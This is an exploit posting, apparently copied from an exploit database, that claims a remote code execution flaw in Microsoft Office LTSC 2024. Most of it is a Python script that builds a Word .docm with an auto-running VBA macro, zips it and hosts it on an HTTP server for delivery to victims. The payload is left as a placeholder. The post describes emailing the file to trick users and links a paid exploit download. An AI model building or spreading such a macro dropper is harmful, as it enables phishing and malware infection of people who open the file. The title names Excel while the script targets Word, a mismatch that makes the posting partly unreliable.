扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 |
# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE) # Author: nu11secur1ty # Date: 06/16/2025 # Vendor: Microsoft # Software: https://www.microsoft.com/en/microsoft-365/excel?market=af # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751 # CVE-2025-47957 # Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise ## Description: The attacker can trick any user into opening and executing their code by sending a malicious DOCX file via email or a streaming server. After the execution of the victim, his machine can be infected or even worse than ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE MACROS OPTIONS FROM YOUR OFFICE 365!!! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: ``` #!/usr/bin/python # CVE-2025-47957 by nu11secur1ty import os import time import zipfile import threading import http.server import socket import socketserver import win32com.client def get_local_ip(): """Get the LAN IP address of the current machine.""" try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80))# External DNS, just for routing ip = s.getsockname()[0] s.close() return ip except: return "127.0.0.1" def create_docm_with_auto_macro(filename): script_dir = os.path.dirname(os.path.abspath(__file__)) full_path = os.path.join(script_dir, filename) word = win32com.client.Dispatch("Word.Application") word.Visible = False doc = word.Documents.Add() doc.Content.Text = "This document contains an auto-starting macro." vbproject = doc.VBProject vbcomponent = vbproject.VBComponents.Add(1)# Standard Module macro_code = ''' Sub AutoOpen() Call YOUR_PoC End Sub Sub YOUR_PoC() Dim Program As String Dim TaskID As Double On Error Resume Next Program = "YOUR_EXPLOIT_HERE" TaskID = YOUR_TASK_HERE If Err <> 0 Then MsgBox "Can't start " & Program End If End Sub ''' vbcomponent.CodeModule.AddFromString(macro_code) wdFormatXMLDocumentMacroEnabled = 13 doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled) doc.Close() word.Quit() print(f"[+] Macro-enabled .docm saved at: {full_path}") return full_path def compress_to_zip(filepath): zip_path = filepath + '.zip' with zipfile.ZipFile(zip_path, 'w') as zipf: zipf.write(filepath, arcname=os.path.basename(filepath)) print(f"[+] Compressed to ZIP: {zip_path}") return zip_path def start_http_server(directory, port=8000): os.chdir(directory) handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(("", port), handler) ip = get_local_ip() print(f"[+] HTTP server running at: http://{ip}:{port}/") thread = threading.Thread(target=httpd.serve_forever) thread.daemon = True thread.start() return httpd if __name__ == "__main__": filename = "CVE-2025-47957.docm" docm_path = create_docm_with_auto_macro(filename) zip_path = compress_to_zip(docm_path) server = start_http_server(os.path.dirname(docm_path)) try: print("[*] Server running — press Ctrl+C to stop...") while True: time.sleep(1) except KeyboardInterrupt: print("\n[!] Ctrl+C detected — shutting down server...") server.shutdown() print("[+] The Exploit Server stopped. Goodbye!") ``` # Reproduce: [href](https://www.youtube.com/watch?v=r4NsGrO56yo) # Buy an exploit only: [href](https://satoshidisk.com/pay/COeJqt) # Time spent: 01:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> |
体验盒子
